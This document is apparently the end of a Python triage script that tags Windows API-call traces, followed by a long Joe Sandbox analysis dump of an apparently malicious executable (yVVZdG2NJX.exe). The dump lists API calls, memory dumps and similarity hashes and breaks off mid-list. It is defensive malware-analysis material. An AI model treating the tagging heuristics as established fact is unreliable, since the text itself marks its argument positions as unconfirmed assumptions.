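def decode_message(call: ApiCall) -> Optional[str]:
    """Name the uMsg of a SendMessageW call. Assumption: the 2nd captured value is uMsg."""
    if call.api != "SendMessageW" or len(call.args) < 2:
        return None
    msg = _hex(call.args[1])
    return WINDOW_MESSAGES.get(msg) if msg is not None else None


def flags(trace: FunctionTrace) -> List[str]:
    """Triage tags. Subcalls count, since their behaviour is reachable from this function."""
    names = {c.api for c in trace.calls}
    out: List[str] = []
    if "GetProcAddress" in names and any(n.startswith(("LoadLibrary", "GetModuleHandle")) for n in names):
        out.append("dynamic-api-resolution")
    if any(n.startswith("RegEnum") for n in names):
        out.append("registry-enumeration")
    for c in trace.calls:
        # Assumption: the 3rd captured value of LoadLibraryExW is its dwFlags argument.
        if c.api == "LoadLibraryExW" and len(c.args) >= 3:
            fl = _hex(c.args[2])
            if fl is not None and fl & LOAD_WITH_ALTERED_SEARCH_PATH:
                out.append("altered-dll-search-path")
                break
    return out


if __name__ == "__main__":
    for i, t in enumerate(parse_traces(SAMPLE)):
        print(i, [c.api for c in t.direct_calls], flags(t), file_paths(t))
```

Running the module on the constructed sample tags the first trace only with "altered-dll-search-path", the second with "registry-enumeration" plus the nsg9061.tmp path, and the third with both "dynamic-api-resolution" and "altered-dll-search-path", which is the GetSystemDirectoryW, wsprintfW, LoadLibraryExW, GetProcAddress sequence behind the "Contains functionality to dynamically determine API calls" signature in the report header. Because the captured values are raw stack slots rather than decoded parameters, treat the argument-position assumptions as hints to be confirmed in the disassembly, not as facts.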
                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                        • Part of subcall function 00406601: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                                                        • Part of subcall function 00406601: wsprintfW.USER32 ref: 00406653
                                                                        • Part of subcall function 00406601: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                      • String ID:
                                                                      • API String ID: 2547128583-0
                                                                      • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                      • Instruction ID: f8cbec149f8048a337a195de8e089d72e19c2715f3a6386891d9cbb614a09016
                                                                      • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                      • Instruction Fuzzy Hash: D3E08C326042116AD7119A709E4497B66AC9A89740307883EFD46F2181EB3A9C31AAAD
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\yVVZdG2NJX.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: File$AttributesCreate
                                                                      • String ID:
                                                                      • API String ID: 415043291-0
                                                                      • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                      • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                      • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                      • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,?,0040596D,?,?,00000000,00405B43,?,?,?,?), ref: 00405D6D
                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D81
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                      • Instruction ID: 56b75d8f9ca2641e27e40e0bc5846bc1deeaaca66535f557d4a9eea11918b9db
                                                                      • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                      • Instruction Fuzzy Hash: 39D01272504421AFC2512738EF0C89BBF95DF543717128B35FEE9A22F0CB314C568A98
                                                                      APIs
                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 00405851
                                                                      • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040585F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectoryErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1375471231-0
                                                                      • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                      • Instruction ID: 569726fefb5a692a208b00f3c4627a0038051db83374957b12f20e82e1ac62f2
                                                                      • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                      • Instruction Fuzzy Hash: 97C08C71211501DAC7002F318F08B073A50AB20340F15883DA64AE00E0CA308024D92D
                                                                      APIs
                                                                      • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040615B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                      • Instruction ID: 5f0451bdd463ed866e2305ac1dfee878cc5b4d333075ebda4e05e47d22d2a603
                                                                      • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                      • Instruction Fuzzy Hash: 6BE0E672110109BEDF099F50DD0AD7B371DE704304F01452EFA06D5051E6B5AD305674
                                                                      APIs
                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403321,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E24
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                      • Instruction ID: 994fac52afecd872c6575aa209eb3fbbfd601c2a51b89c6ee9ed5d101180f43c
                                                                      • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                      • Instruction Fuzzy Hash: 93E08C3220525AABCF109F51CC04EEB3B6CEB04360F000832FD98E2040D230EA219BE4
                                                                      APIs
                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032D7,000000FF,0078B6D8,?,0078B6D8,?,?,00000004,00000000), ref: 00405E53
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                      • Instruction ID: 720248cc98aac2988b2abacb793a2dea5f933c74ab6652834825bf215bbdf934
                                                                      • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                      • Instruction Fuzzy Hash: 72E08C3220025AABCF109F60DC00AEB3B6CFB007E0F048432F951E3040D230EA208FE4
APIs
• VirtualProtect.KERNELBASE(703D405C,00000004,00000040,703D404C), ref: 703D29B5
Memory Dump Source
• Source File: 00000000.00000002.1598887120.00000000703D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 703D0000, based on PE: true
• Associated: 00000000.00000002.1598873256.00000000703D0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.1598903143.00000000703D3000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.1598921247.00000000703D5000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_703d0000_yVVZdG2NJX.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 05c8fa7ab782af747f15f5bed91c5f8d40109f26461e3837ef64358adbf78216
• Instruction ID: fccd065ce56525b20e976aad7a0047628d4986508826e4a284a0f210649b2480
• Opcode Fuzzy Hash: 05c8fa7ab782af747f15f5bed91c5f8d40109f26461e3837ef64358adbf78216
• Instruction Fuzzy Hash: 01F0A5F3905280DFE350CF7A9C44B05BBE8E359304B2285AAE3ADD6260E3B44444CF11
APIs
• RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F00,?,?,00406192,007A0F00,00000000,?,?,Call,?), ref: 00406128
Memory Dump Source
• Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
• Instruction ID: 68c61e8d1810f1ea9cab55705828a401d3ebcdae1eadef42580152fd7570d6fd
• Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
• Instruction Fuzzy Hash: 4BD0123204020EBBDF11AE909D01FAB3B1DEB08350F014826FE06A80A2D776D530AB54
APIs
• SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
Memory Dump Source
• Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 99b224af46cdf8f89f3b15e0f2cf225334fcfe2526a8f22c9c92f8a7263cf905
• Instruction ID: c073ba0ee5163cb04706f99935c2f3c73a5a9b1a05bee32f9da8622fc5c815d0
• Opcode Fuzzy Hash: 99b224af46cdf8f89f3b15e0f2cf225334fcfe2526a8f22c9c92f8a7263cf905
• Instruction Fuzzy Hash: 68D01272B04100D7DB50DBE4AF4899D73A4AB84369B348577E102F11D0DAB9D9515B29
APIs
• SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403332
Memory Dump Source
• Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
• Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
• Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
• Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
APIs
• Sleep.KERNELBASE(00000000), ref: 004014EA
Memory Dump Source
• Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
